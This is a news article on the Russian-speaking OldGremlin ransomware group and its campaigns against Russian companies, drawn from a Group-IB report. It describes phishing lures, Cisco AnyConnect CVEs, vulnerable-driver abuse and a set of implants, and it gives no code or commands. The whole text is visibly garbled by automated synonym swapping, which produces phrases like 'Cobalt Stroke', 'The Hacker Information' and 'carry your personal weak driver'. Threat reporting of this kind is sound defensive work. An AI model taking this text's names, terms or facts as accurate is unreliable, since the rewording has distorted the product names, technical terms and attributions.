OldGremlin Ransomware Focused Over a Dozen Russian Entities in Multi-Million Scheme

Deal Score0
Deal Score0

A Russian-speaking ransomware group dubbed OldGremlin has been attributed to 16 malicious campaigns geared toward entities working within the transcontinental Eurasian nation over the course of two and a half years.

“The group’s victims embrace firms in sectors akin to logistics, trade, insurance coverage, retail, actual property, software program growth, and banking,” Group-IB said in an exhaustive report shared with The Hacker Information. “In 2020, the group even focused an arms producer.”

In what’s a rarity within the ransomware panorama, OldGremlin (aka TinyScouts) is among the only a few financially motivated cybercrime gangs that primarily focuses on Russian firms.

Different notable teams include Dharma, Crylock, and Thanos, contributing to an uptick in ransomware assaults concentrating on companies within the nation by over 200% in 2021.

OldGremlin first got here to mild in September 2020 when the Singapore-headquartered cybersecurity firm disclosed 9 campaigns orchestrated by the actor between Could and August. The primary assault was detected in early April 2020.

In all, the group is alleged to have performed 10 phishing e-mail campaigns in 2020, adopted by one extremely profitable assault in 2021 and 5 extra in 2022, with ransom calls for touching a file $16.9 million.

“OldGremlin totally research their victims,” Group-IB defined. “The demanded ransom is subsequently typically proportional to the corporate’s dimension and income and is clearly larger than the funds vital for making certain an appropriate degree of data safety.”


Identified to primarily goal enterprise networks working on Home windows, assaults mounted by OldGremlin have leveraged phishing emails masquerading as tax and authorized companies firms to dupe victims into clicking on fraudulent hyperlinks and downloading malicious recordsdata, permitting the attackers to worm their manner contained in the networks.

“The menace actors typically pose as well-known firms, together with the media group RBC, the authorized help system Guide Plus, the corporate 1C-Bitrix, the Russian Union of Industrialists and Entrepreneurs, and Minsk Tractor Works,” Group-IB stated.

Upon gaining an preliminary foothold, OldGremlin strikes to ascertain persistence by creating scheduled duties, gaining elevated privileges utilizing Cobalt Stroke, and even flaw in Cisco AnyConnect (CVE-2020-3153 and CVE-2020-3433), whereas additionally gaining distant entry to the compromised infrastructure utilizing instruments akin to TeamViewer.

A number of the points that make the crew stand out from different ransomware teams is that it would not depend on double extortion to coerce focused firms into paying up regardless of exfiltrating the information. It has additionally been noticed taking lengthy breaks after every profitable assault.

What’s extra, the common dwell time till ransomware deployment has been pegged at 49 days, nicely above the reported 11 day median dwell time, suggesting prolonged efforts on a part of the actor to look at the breached area (which is achieved utilizing a device referred to as TinyScout).

OldGremlin’s most up-to-date phishing wave occurred on August 23, 2022, with emails embedding hyperlinks pointing to a ZIP archive payload hosted on Dropbox to activate the killchain.

These archive recordsdata, in flip, harbor a rogue LNK file (dubbed TinyLink) that downloads a backdoor referred to as TinyFluff, which is one among the many 4 implants utilized by the group: TinyPosh, TinyNode, and TinyShell, earlier than deleting information backups and dropping the .NET-based TinyCrypt ransomware.

  • TinyPosh: A PowerShell trojan engineered to gather and switch delicate details about the contaminated system to a distant server, and launch further PowerShell scripts.
  • TinyNode: A backdoor that runs the Node.js interpreter to execute instructions acquired from a command-and-control (C2) server over the Tor community.
  • TinyFluff: A successor to TinyNode, which is used as the first downloader for receiving and working malicious scripts.

Additionally put to make use of by OldGremlin are different instruments akin to TinyShot, a console utility for capturing screenshots, TinyKiller, which kills antivirus processes through a carry your personal weak driver (BYOVD) assault concentrating on gdrv.sys and RTCore64.sys drivers.


It is value noting that the operators behind the BlackByte ransomware group had been additionally not too long ago discovered leveraging the same flaw within the RTCore64.sys driver to show off safety options within the hacked machines.

One different uncommon software utilized by OldGremlin in its assaults is a .NET console app referred to as TinyIsolator, which quickly cuts off the host from the community by disabling community adaptors previous to executing the ransomware.

On high of that, the group’s malware arsenal encompasses a Linux model of TinyCrypt, which is written in GO and launched after deleting .bash_history recordsdata, altering person passwords to restrict entry to the compromised host, and disabling SSH.

“OldGremlin has debunked the parable that ransomware teams are detached to Russian firms,” Ivan Pisarev, head of dynamic malware evaluation workforce at Group-IB, stated.

“Even though OldGremlin has been specializing in Russia thus far, they shouldn’t be underestimated elsewhere. Many Russian-speaking gangs began off by concentrating on firms in post-Soviet house after which switched to different geographies.”

We will be happy to hear your thoughts

Leave a reply

Enable registration in settings - general